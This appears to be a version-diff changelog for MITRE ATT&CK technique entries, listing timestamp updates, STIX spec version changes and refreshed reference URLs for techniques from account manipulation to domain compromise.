external_references[1]['description'] | Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail! Enterprise Email Compromise. Retrieved April 22, 2019. | Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail! Enterprise Email Compromise. Retrieved November 17, 2024. |
external_references[1]['url'] | https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf | https://web.archive.org/web/20190508170121/https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf |
external_references[2]['description'] | Knowles, W. (2017, April 21). Add-In Opportunities for Office Persistence. Retrieved July 3, 2017. | Knowles, W. (2017, April 21). Add-In Opportunities for Office Persistence. Retrieved November 17, 2024. |
external_references[2]['url'] | https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/ | https://web.archive.org/web/20190526112859/https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/ |
[T1098.001] Account Manipulation: Additional Cloud Credentials
Current version: 2.8
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 21:45:50.674000+00:00 |
[T1098.003] Account Manipulation: Additional Cloud Roles
Current version: 2.5
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 21:46:09.054000+00:00 |
[T1098.006] Account Manipulation: Additional Container Cluster Roles
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2023-10-16 17:51:35.865000+00:00 | 2025-04-15 21:46:31.661000+00:00 |
[T1098.002] Account Manipulation: Additional Email Delegate Permissions
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 15:37:25.303000+00:00 | 2025-04-15 21:47:23.761000+00:00 |
external_references[1]['description'] | Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019. | Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365 | https://www.slideshare.net/slideshow/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365/128744511 |
external_references[5]['description'] | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved November 17, 2024. |
external_references[5]['url'] | https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf | https://static.carahsoft.com/concrete/files/1015/2779/3571/M-Trends-2018-Report.pdf |
[T1098.007] Account Manipulation: Additional Local or Domain Groups
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-14 14:32:08.926000+00:00 | 2025-04-15 21:47:40.787000+00:00 |
[T1574.014] Hijack Execution Flow: AppDomainManager
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-04-28 15:44:25.342000+00:00 | 2025-04-15 21:48:08.401000+00:00 |
[T1499.003] Endpoint Denial of Service: Application Exhaustion Flood
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 15:41:49.168000+00:00 | 2025-04-15 21:48:39.804000+00:00 |
[T1010] Application Window Discovery
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 16:22:56.372000+00:00 | 2025-04-15 21:49:50.019000+00:00 |
[T1499.004] Endpoint Denial of Service: Application or System Exploitation
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 15:42:23.001000+00:00 | 2025-04-15 21:50:12.334000+00:00 |
[T1560] Archive Collected Data
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-01-20 00:07:58.958000+00:00 | 2025-04-15 21:50:30.319000+00:00 |
external_references[1]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.justice.gov/file/1080281/download | https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf |
[T1560.003] Archive Collected Data: Archive via Custom Method
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2020-03-25 22:48:14.605000+00:00 | 2025-04-15 21:50:49.814000+00:00 |
[T1560.002] Archive Collected Data: Archive via Library
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2020-03-29 18:27:30.891000+00:00 | 2025-04-15 21:51:09.003000+00:00 |
[T1560.001] Archive Collected Data: Archive via Utility
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2023-09-15 19:02:53.995000+00:00 | 2025-04-15 21:51:23.078000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1123] Audio Capture
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 13:39:22.774000+00:00 | 2025-04-15 21:51:52.461000+00:00 |
[T1496.002] Resource Hijacking: Bandwidth Hijacking
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-09-25 14:59:35.287000+00:00 | 2025-04-15 21:52:31.979000+00:00 |
[T1552.003] Unsecured Credentials: Bash History
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-09-12 15:24:04.912000+00:00 | 2025-04-15 21:52:49.389000+00:00 |
[T1584.005] Compromise Infrastructure: Botnet
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2022-04-19 15:55:58.319000+00:00 | 2025-04-16 13:38:12.734000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1036.009] Masquerading: Break Process Trees
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2023-10-03 04:06:42.256000+00:00 | 2025-04-15 21:54:02.243000+00:00 |
[T1217] Browser Information Discovery
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2023-04-16 14:24:40.625000+00:00 | 2025-04-15 21:54:16.719000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1612] Build Image on Host
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2023-04-15 16:22:09.807000+00:00 | 2025-04-15 21:54:42.589000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1591.002] Gather Victim Org Information: Business Relationships
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2021-04-15 03:36:58.964000+00:00 | 2025-04-15 21:54:59.306000+00:00 |
[T1596.004] Search Open Technical Databases: CDNs
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2021-04-15 03:47:55.905000+00:00 | 2025-04-15 21:55:21.053000+00:00 |
[T1003.005] OS Credential Dumping: Cached Domain Credentials
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 14:18:59.123000+00:00 | 2025-04-15 21:55:45.923000+00:00 |
[T1558.005] Steal or Forge Kerberos Tickets: Ccache Files
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-14 21:26:37.856000+00:00 | 2025-04-15 21:56:03.788000+00:00 |
[T1552.008] Unsecured Credentials: Chat Messages
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 21:56:22.979000+00:00 |
[T1070.002] Indicator Removal: Clear Linux or Mac System Logs
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2020-03-29 21:23:51.886000+00:00 | 2025-04-15 21:56:45.103000+00:00 |
[T1070.008] Indicator Removal: Clear Mailbox Data
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 15:43:56.839000+00:00 | 2025-04-15 21:56:59.810000+00:00 |
[T1592.004] Gather Victim Host Information: Client Configurations
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2021-10-17 16:35:09.668000+00:00 | 2025-04-15 21:57:34.604000+00:00 |
[T1115] Clipboard Data
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2023-04-14 21:51:47.277000+00:00 | 2025-04-15 21:57:50.289000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1087.004] Account Discovery: Cloud Account
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 15:51:18.808000+00:00 | 2025-04-15 22:00:56.981000+00:00 |
[T1136.003] Create Account: Cloud Account
Current version: 1.6
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:01:16.589000+00:00 |
[T1585.003] Establish Accounts: Cloud Accounts
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2022-10-25 15:49:14.785000+00:00 | 2025-04-15 22:01:31.837000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[T1586.003] Compromise Accounts: Cloud Accounts
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-16 21:26:36.312000+00:00 | 2025-04-15 22:01:54.640000+00:00 |
[T1069.003] Permission Groups Discovery: Cloud Groups
Current version: 1.5
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 15:51:35.759000+00:00 | 2025-04-15 22:02:13.319000+00:00 |
[T1580] Cloud Infrastructure Discovery
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-09-30 13:28:37.415000+00:00 | 2025-04-15 22:02:30.057000+00:00 |
external_references[8]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
[T1552.005] Unsecured Credentials: Cloud Instance Metadata API
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 16:24:20.219000+00:00 | 2025-04-15 22:02:45.218000+00:00 |
[T1555.006] Credentials from Password Stores: Cloud Secrets Management Stores
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 14:20:16.722000+00:00 | 2025-04-15 22:03:00.834000+00:00 |
[T1526] Cloud Service Discovery
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:03:24.903000+00:00 |
[T1496.004] Resource Hijacking: Cloud Service Hijacking
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-16 17:59:27.535000+00:00 | 2025-04-15 22:03:40.356000+00:00 |
[T1021.007] Remote Services: Cloud Services
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 15:52:47.255000+00:00 | 2025-04-15 22:03:56.494000+00:00 |
[T1619] Cloud Storage Object Discovery
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2022-04-11 22:29:43.677000+00:00 | 2025-04-15 22:04:12.682000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1593.003] Search Open Websites/Domains: Code Repositories
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2022-10-26 18:01:20.520000+00:00 | 2025-04-15 22:04:43.188000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[T1213.003] Data from Information Repositories: Code Repositories
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-09-04 13:03:54.101000+00:00 | 2025-04-15 22:04:59.867000+00:00 |
[T1587.002] Develop Capabilities: Code Signing Certificates
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2021-10-17 16:07:08.549000+00:00 | 2025-04-15 22:05:55.035000+00:00 |
[T1588.003] Obtain Capabilities: Code Signing Certificates
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2021-10-17 16:19:50.018000+00:00 | 2025-04-15 22:05:19.685000+00:00 |
[T1027.010] Obfuscated Files or Information: Command Obfuscation
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-09-12 19:43:18.873000+00:00 | 2025-04-15 22:06:13.992000+00:00 |
[T1092] Communication Through Removable Media
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-01-31 03:17:42.004000+00:00 | 2025-04-15 22:06:39.028000+00:00 |
[T1586] Compromise Accounts
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2023-04-11 01:08:56.774000+00:00 | 2025-04-15 22:07:30.871000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1195.003] Supply Chain Compromise: Compromise Hardware Supply Chain
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2022-04-28 16:05:10.755000+00:00 | 2025-04-15 22:07:50.636000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1195.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-04-13 14:47:31.204000+00:00 | 2025-04-15 22:08:13.223000+00:00 |
[T1195.002] Supply Chain Compromise: Compromise Software Supply Chain
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2022-04-28 16:04:36.636000+00:00 | 2025-04-15 22:08:31.739000+00:00 |
external_references[2]['description'] | Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018. | Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.commandfive.com/papers/C5_APT_SKHack.pdf | https://web.archive.org/web/20160309235002/https://www.commandfive.com/papers/C5_APT_SKHack.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1496.001] Resource Hijacking: Compute Hijacking
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-13 16:58:38.820000+00:00 | 2025-04-15 22:08:46.014000+00:00 |
[T1556.009] Modify Authentication Process: Conditional Access Policies
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-09-16 16:54:47.595000+00:00 | 2025-04-15 22:09:03.621000+00:00 |
[T1213.001] Data from Information Repositories: Confluence
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-08-30 13:45:42.840000+00:00 | 2025-04-15 22:09:18.055000+00:00 |
[T1552.007] Unsecured Credentials: Container API
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 16:25:28.820000+00:00 | 2025-04-15 22:09:34.621000+00:00 |
[T1543.005] Create or Modify System Process: Container Service
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-04-16 12:35:38.832000+00:00 | 2025-04-15 22:10:00.252000+00:00 |
[T1613] Container and Resource Discovery
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2023-04-15 16:08:50.706000+00:00 | 2025-04-15 22:10:13.179000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1659] Content Injection
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2023-10-01 02:28:45.147000+00:00 | 2025-04-15 22:10:29.343000+00:00 |
[T1578.002] Modify Cloud Compute Infrastructure: Create Cloud Instance
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-09-30 13:28:37.416000+00:00 | 2025-04-15 22:10:54.239000+00:00 |
external_references[3]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
[T1578.001] Modify Cloud Compute Infrastructure: Create Snapshot
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 15:53:44.870000+00:00 | 2025-04-15 22:11:14.755000+00:00 |
external_references[4]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
[T1543] Create or Modify System Process
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-02-15 14:14:03.942000+00:00 | 2025-04-15 22:11:29.155000+00:00 |
external_references[3]['description'] | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017. | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf | https://papers.put.as/papers/macosx/2016/RSA_OSX_Malware.pdf |
[T1589.001] Gather Victim Identity Information: Credentials
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-10 13:45:01.069000+00:00 | 2025-04-15 22:11:53.342000+00:00 |
external_references[3]['description'] | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020. | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved November 17, 2024. |
external_references[3]['url'] | https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/ | https://labs.detectify.com/writeups/slack-bot-token-leakage-exposing-business-critical-information/ |
[T1555] Credentials from Password Stores
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 14:57:46.850000+00:00 | 2025-04-15 22:12:11.343000+00:00 |
[T1555.003] Credentials from Password Stores: Credentials from Web Browsers
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-08-15 14:13:45.294000+00:00 | 2025-04-15 22:12:28.087000+00:00 |
[T1213.004] Data from Information Repositories: Customer Relationship Management Software
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-17 14:36:24.983000+00:00 | 2025-04-15 22:12:49.744000+00:00 |
[T1003.006] OS Credential Dumping: DCSync
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 15:54:08.312000+00:00 | 2025-04-15 22:13:04.812000+00:00 |
external_references[12]['description'] | Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017. | Wine API. (n.d.). samlib.dll. Retrieved November 17, 2024. |
external_references[12]['url'] | https://source.winehq.org/WineAPI/samlib.html | https://strontic.github.io/xcyclopedia/library/samlib.dll-0BDF6351009F6EBA5BA7E886F23263B1.html |
[T1557.003] Adversary-in-the-Middle: DHCP Spoofing
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-09-12 19:46:04.759000+00:00 | 2025-04-15 22:13:20.292000+00:00 |
[T1590.002] Gather Victim Network Information: DNS
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-11-11 16:13:02.196000+00:00 | 2025-04-15 22:13:37.080000+00:00 |
[T1583.002] Acquire Infrastructure: DNS Server
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2021-04-15 02:49:49.702000+00:00 | 2025-04-15 22:14:14.654000+00:00 |
[T1584.002] Compromise Infrastructure: DNS Server
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2022-04-19 21:22:13.578000+00:00 | 2025-04-15 22:13:56.342000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1596.001] Search Open Technical Databases: DNS/Passive DNS
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2021-04-15 03:49:13.409000+00:00 | 2025-04-15 22:14:34.882000+00:00 |
[T1565] Data Manipulation
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-02-02 17:18:39.004000+00:00 | 2025-04-15 22:14:59.144000+00:00 |
[T1530] Data from Cloud Storage
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:15:26.889000+00:00 |
[T1213] Data from Information Repositories
Current version: 3.4
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-28 19:10:16.960000+00:00 | 2025-04-15 22:15:46.213000+00:00 |
[T1578.003] Modify Cloud Compute Infrastructure: Delete Cloud Instance
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-09-30 13:28:37.415000+00:00 | 2025-04-15 22:16:21.146000+00:00 |
external_references[3]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
[T1591.001] Gather Victim Org Information: Determine Physical Locations
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2021-08-27 15:37:09.025000+00:00 | 2025-04-15 22:16:44.365000+00:00 |
external_references[2]['description'] | U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021. | U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.sec.gov/edgar/search-and-access | https://www.sec.gov/edgar/search/ |
[T1587] Develop Capabilities
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 16:31:17.270000+00:00 | 2025-04-15 22:17:05.876000+00:00 |
[T1652] Device Driver Discovery
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2023-05-04 18:07:16.804000+00:00 | 2025-04-15 22:17:22.391000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1098.005] Account Manipulation: Device Registration
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-09-25 20:39:53.597000+00:00 | 2025-04-15 22:17:39.860000+00:00 |
[T1588.004] Obtain Capabilities: Digital Certificates
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-09-16 16:19:41.567000+00:00 | 2025-04-15 22:18:17.702000+00:00 |
[T1587.003] Develop Capabilities: Digital Certificates
Current version: 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2021-10-16 17:32:34.604000+00:00 | 2025-04-15 22:18:36.653000+00:00 |
[T1596.003] Search Open Technical Databases: Digital Certificates
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2021-04-15 03:48:37.628000+00:00 | 2025-04-15 22:18:01.430000+00:00 |
[T1021.008] Remote Services: Direct Cloud VM Connections
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2023-10-27 18:32:11.219000+00:00 | 2025-04-15 22:18:53.305000+00:00 |
[T1498.001] Network Denial of Service: Direct Network Flood
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 15:54:49.943000+00:00 | 2025-04-15 22:19:07.343000+00:00 |
[T1562.007] Impair Defenses: Disable or Modify Cloud Firewall
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-16 19:38:57.374000+00:00 | 2025-04-15 22:19:38.109000+00:00 |
[T1562.008] Impair Defenses: Disable or Modify Cloud Logs
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:19:53.826000+00:00 |
[T1562.012] Impair Defenses: Disable or Modify Linux Audit System
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-03 03:44:46.935000+00:00 | 2025-04-15 22:20:10.121000+00:00 |
[T1021.003] Remote Services: Distributed Component Object Model
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-11 20:21:55.610000+00:00 | 2025-04-15 22:20:51.024000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1087.002] Account Discovery: Domain Account
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-05-31 04:00:37.651000+00:00 | 2025-04-15 22:21:07.252000+00:00 |
[T1136.002] Create Account: Domain Account
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-01 04:37:36.774000+00:00 | 2025-04-15 22:21:24.212000+00:00 |
[T1556.001] Modify Authentication Process: Domain Controller Authentication
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-08-21 15:26:54.386000+00:00 | 2025-04-15 22:21:45.658000+00:00 |
[T1069.002] Permission Groups Discovery: Domain Groups
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-07 17:16:47.754000+00:00 | 2025-04-15 22:22:08.417000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1590.001] Gather Victim Network Information: Domain Properties
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-21 14:32:05.257000+00:00 | 2025-04-15 22:22:22.764000+00:00 |
external_references[5]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | NTT America. (n.d.). Whois Lookup. Retrieved November 17, 2024. |
external_references[5]['url'] | https://www.whois.net/ | https://who.is/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1482] Domain Trust Discovery
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-06-16 19:18:22.305000+00:00 | 2025-04-15 22:22:35.004000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1583.001] Acquire Infrastructure: Domains
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-25 15:26:00.047000+00:00 | 2025-04-15 22:23:15.751000+00:00 |
[T1584.001] Compromise Infrastructure: Domains
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-24 15:10:40.270000+00:00 | 2025-04-15 22:22:55.487000+00:00 |
external_references[2]['description'] | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017. | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved November 17, 2024. |
